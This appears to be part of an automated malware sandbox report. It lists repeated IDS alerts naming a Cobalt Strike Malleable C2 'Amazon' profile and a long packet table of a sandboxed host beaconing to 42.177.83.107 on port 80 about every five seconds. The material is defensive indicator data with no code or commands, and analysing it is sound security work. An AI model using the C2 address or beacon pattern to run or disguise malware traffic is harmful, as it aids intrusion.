2024-12-30T09:16:22.809343+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:22.809343+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:28.367420+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:28.367420+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:33.941682+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:33.941682+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:39.970265+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:39.970265+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:45.552738+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:45.552738+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:51.118357+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:51.118357+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:57.150055+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:57.150055+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:17:02.805519+0100	2032749	ET MALWARE Cobalt Strike Malleable C2 Amazon Profile	1	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:17:02.805519+0100	2055356	ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)	1	192.168.2.5	49704	42.177.83.107	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 09:15:01.185926914 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:01.190871954 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:01.190975904 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:01.191097975 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:01.195935965 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:03.189079046 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:03.189162970 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.392365932 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.397270918 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.957767010 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.957792997 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.957803011 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.957854986 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.957912922 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.957945108 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.957957029 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.957967997 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.957981110 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.957990885 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.958000898 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.958002090 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.958023071 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.958053112 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.958245039 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.958256006 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.958303928 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.962790012 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.962810993 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.962857008 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.962913990 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.963004112 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.963016033 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.963063002 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:08.994626045 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.994642019 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:08.994713068 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.633779049 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.633888960 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.638767958 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.638782978 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.638799906 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.638809919 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.638856888 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.638906002 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.638919115 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.638930082 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.638983011 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.639014959 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.639024019 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.639096022 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.639098883 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.639108896 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.639168024 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.643381119 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.643457890 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.643683910 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.643692970 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.643743038 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.643757105 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.643759012 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.643802881 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.643830061 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.643893003 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.643896103 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.643937111 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.643958092 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.644001007 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.644001961 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.644058943 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.644112110 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.644120932 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.644129038 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.644162893 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.644197941 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.644262075 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.648371935 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.648441076 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.648608923 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.648658037 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.648689032 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.648691893 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.648736000 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.648746967 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.648768902 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.648801088 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.648832083 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.648868084 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.648886919 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.648937941 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.648984909 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.648996115 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649003029 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649017096 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649051905 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649087906 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649108887 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649118900 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649185896 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649215937 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649225950 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649281979 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649321079 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649331093 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649369001 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649379015 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649384022 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649429083 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649436951 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649450064 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649481058 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649487972 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649490118 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649516106 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649529934 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649539948 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649565935 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649596930 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649600029 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649606943 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649622917 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.649655104 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.649698019 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.653283119 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653354883 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.653426886 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653435946 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653443098 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653501987 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.653559923 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653568983 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653620005 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.653657913 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653666973 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653686047 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653693914 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653737068 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.653762102 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653772116 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653800964 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653809071 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653831005 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.653866053 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.653889894 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653898954 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653938055 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653945923 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.653965950 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.654015064 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.654082060 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654092073 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654098988 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654105902 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654114008 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654118061 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654154062 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.654156923 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654169083 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654201984 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:09.654215097 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654223919 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654306889 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654314995 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654361963 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654370070 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654414892 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654422998 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654468060 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654475927 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654540062 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654547930 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654577017 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654584885 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654602051 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654609919 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654737949 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654746056 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654753923 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654766083 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654776096 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654783010 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654799938 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654808044 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654845953 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654854059 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654896021 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.654903889 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655003071 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655010939 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655018091 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655028105 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655035973 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655044079 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655050039 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655056953 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655095100 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655102968 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655112028 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655119896 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655133963 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655142069 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.655148983 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658144951 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658153057 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658262014 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658401966 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658410072 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658420086 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658452988 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658540964 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658549070 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658593893 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658601999 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658643007 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658691883 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658771038 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658780098 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658797979 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658835888 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658896923 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.658904076 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659004927 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659013033 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659069061 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659075975 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659092903 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659116030 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659152985 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659159899 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659207106 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659214973 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659262896 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659271002 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659328938 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659338951 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659385920 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659394026 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659485102 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659492970 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659528017 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659537077 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659550905 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659559011 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659568071 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659611940 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659619093 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659626961 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659668922 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659677982 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:09.659687996 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:14.940677881 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:14.940757036 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:19.980071068 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:19.984951973 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:20.538280010 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:20.538352013 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:25.548466921 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:25.553255081 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:26.102740049 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:26.104437113 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:31.138855934 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:31.143753052 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:32.041342020 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:32.041416883 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:37.048958063 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:37.054081917 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:37.604639053 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:37.604834080 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:42.611259937 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:42.616203070 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:43.173157930 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:43.173422098 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:48.208436966 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:48.213284016 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:48.761815071 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:48.765587091 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:53.815128088 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:53.820205927 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:54.381702900 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:54.381769896 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:59.407846928 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:15:59.413360119 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:59.987550020 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:15:59.987682104 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:05.049479008 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:05.054527044 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:05.624389887 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:05.624456882 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:10.642472982 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:10.647392988 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:11.222099066 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:11.223520994 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:16.235898018 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:16.240761995 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:17.157418966 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:17.157486916 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:22.173614025 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:22.178497076 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:22.809137106 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:22.809343100 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:27.814014912 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:27.818943977 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:28.367325068 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:28.367419958 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:33.376581907 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:33.381486893 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:33.941281080 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:33.941682100 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:38.954734087 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:38.959645033 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:39.970186949 CET	80	49704	42.177.83.107	192.168.2.5
